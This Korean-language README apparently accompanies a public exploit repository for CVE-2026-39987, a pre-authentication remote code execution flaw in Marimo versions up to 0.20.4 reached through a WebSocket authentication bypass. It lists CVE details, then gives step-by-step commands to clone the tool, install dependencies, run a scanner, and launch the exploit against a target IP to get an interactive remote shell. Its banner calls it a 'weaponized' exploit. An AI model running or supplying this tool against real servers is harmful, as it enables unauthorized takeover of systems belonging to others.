
Marimo 사전 인증 RCE를 WebSocket 인증 우회를 통해 악용하는 익스플로잇으로, 영향을 받는 버전에서 대화형 셸 접근을 제공합니다.
| 속성 | 세부 정보 |
|---|---|
| CVE ID | CVE-2026-39987 |
| 공격 벡터 | WebSocket 인증 우회 |
| 셸 유형 | 대화형 PTY(의사 터미널) |
| 영향 | 전체 원격 코드 실행(RCE) |
| CVSS 점수 | 9.3(치명적) |
| 영향받는 버전 | Marimo ≤ 0.20.4 |
이 취약점은 Marimo 애플리케이션의 WebSocket 핸드셰이크 메커니즘에 존재합니다. 부적절한 인증 검증으로 인해 공격자는 다음을 수행할 수 있습니다:
근본 원인: WebSocket 업그레이드 핸들러의 인증 검사 누락으로 인증되지 않은 명령 주입이 가능합니다.
# 저장소 복제
python3 -m venv venv
source venv/bin/activate
git clone https://github.com/mki9/CVE-2026-39987_exploit.git
cd CVE-2026-39987_exploit
chmod +x *
# 익스플로잇 명령어
* / 대화형 셸(기본값)
1 / python CVE-2026-39987_exploit.py <TARGET_IP>
* / help
2 / python CVE-2026-39987_exploit.py
# 필수 종속성 설치
pip install websocket-client colorama rich pyfiglet
python CVE-2026-39987_scanner.py
# 입력
[*] Weaponized WebSocket Exploit Test
[!] Authorized Use Only
[?] 대상 IP 주소 또는 호스트 이름 입력:
>> <TARGET_IP>